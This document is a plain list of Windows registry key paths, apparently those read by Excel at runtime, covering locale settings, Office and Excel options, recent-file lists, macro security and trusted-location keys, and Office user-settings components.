HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-OM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-OM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-JM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-JM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-VE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-VE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Cyrl-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sms-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sms-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-YE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-YE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-029
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-029
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smn-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smn-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-RS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-JO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-JO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-AR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-AR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-LB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-LB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-KW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-KW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-UY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-UY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-BH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-BH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-QA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-QA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-SV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-SV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-HN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-HN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-NI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-NI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Cans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Cans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-Hant
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-Hant
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Mong
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Mong
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Excel
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\BypassMigration
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\OPWBypassMigration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Excel
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\BypassMigration
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\UpgradeVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\Lang
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\MTTA
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OptionFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Recent Files
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Recent File List
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Spell Checker
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\WK? Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Auto Save
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Delete Commands
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Answer Wizard
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\WorkbookLinkWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\DataConnectionWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 27
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 26
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 25
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 24
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 23
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 22
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location1\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location2\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location2\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Locations\Location5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Common\Open Find
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\User Settings\
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Access_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Access_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Intl
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Intl
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\outexum
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\outexum\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Core
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Intl
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
